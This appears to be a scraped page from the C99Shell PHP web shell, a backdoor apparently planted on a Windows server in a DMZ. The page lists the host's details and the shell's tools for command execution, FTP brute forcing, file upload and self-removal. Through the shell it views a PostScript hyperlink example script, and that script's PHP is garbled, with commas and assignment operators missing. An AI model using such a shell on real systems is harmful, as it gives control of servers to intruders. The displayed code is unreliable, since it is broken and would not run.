!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\xampp\special\ps\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     hyperlinks.php (1.63 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

$ps 
ps_new();

if (!
ps_open_file($ps"hyperlinks.ps")) {
    print 
"Cannot open PostScript file\n";
    exit;
}

ps_set_parameter($ps"warning""true");

ps_set_info($ps"Creator""hyperlinks.php");
ps_set_info($ps"Author""Uwe Steinmann");
ps_set_info($ps"Title""Creating Hyperlinks with pdfmarks");

$fontsize 20.0;

ps_begin_page($ps596842);
$b1 ps_add_bookmark($ps"Content"00);
ps_add_bookmark($ps"First Page"$b10);
$psfont ps_findfont($ps"Helvetica"""0);
ps_setfont($ps$psfont$fontsize);
ps_set_value($ps"leading"14.0);

ps_show_xy($ps"This is a web link"100100);
$len ps_stringwidth($ps"This is a web link"$psfont$fontsize);
ps_add_weblink($ps100100100+$len130"http://www.mmk-hagen.de");

ps_show_xy($ps"This is a pdf link to an external document"100150);
$len ps_stringwidth($ps"This is a pdf link to an external document"$psfont$fontsize);
ps_add_pdflink($ps100150100+$len180"test.pdf"1"fitpage");

ps_show_xy($ps"This is a launch link"100200);
$len ps_stringwidth($ps"This is a launch link"$psfont$fontsize);
ps_add_launchlink($ps100200100+$len230"/usr/bin/gedit");

ps_show_xy($ps"This is a pdf link within the document"100250);
$len ps_stringwidth($ps"This is a pdf link within the document"$psfont$fontsize);
ps_add_locallink($ps100250100+$len2802"fitpage");

ps_end_page($ps);

ps_begin_page($ps300300);
ps_add_bookmark($ps"Second Page"$b10);
ps_add_note($ps100100200200"This is the contents of the note""Title of Note""help"1);
ps_end_page($ps);

ps_close($ps);
ps_delete($ps);
?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--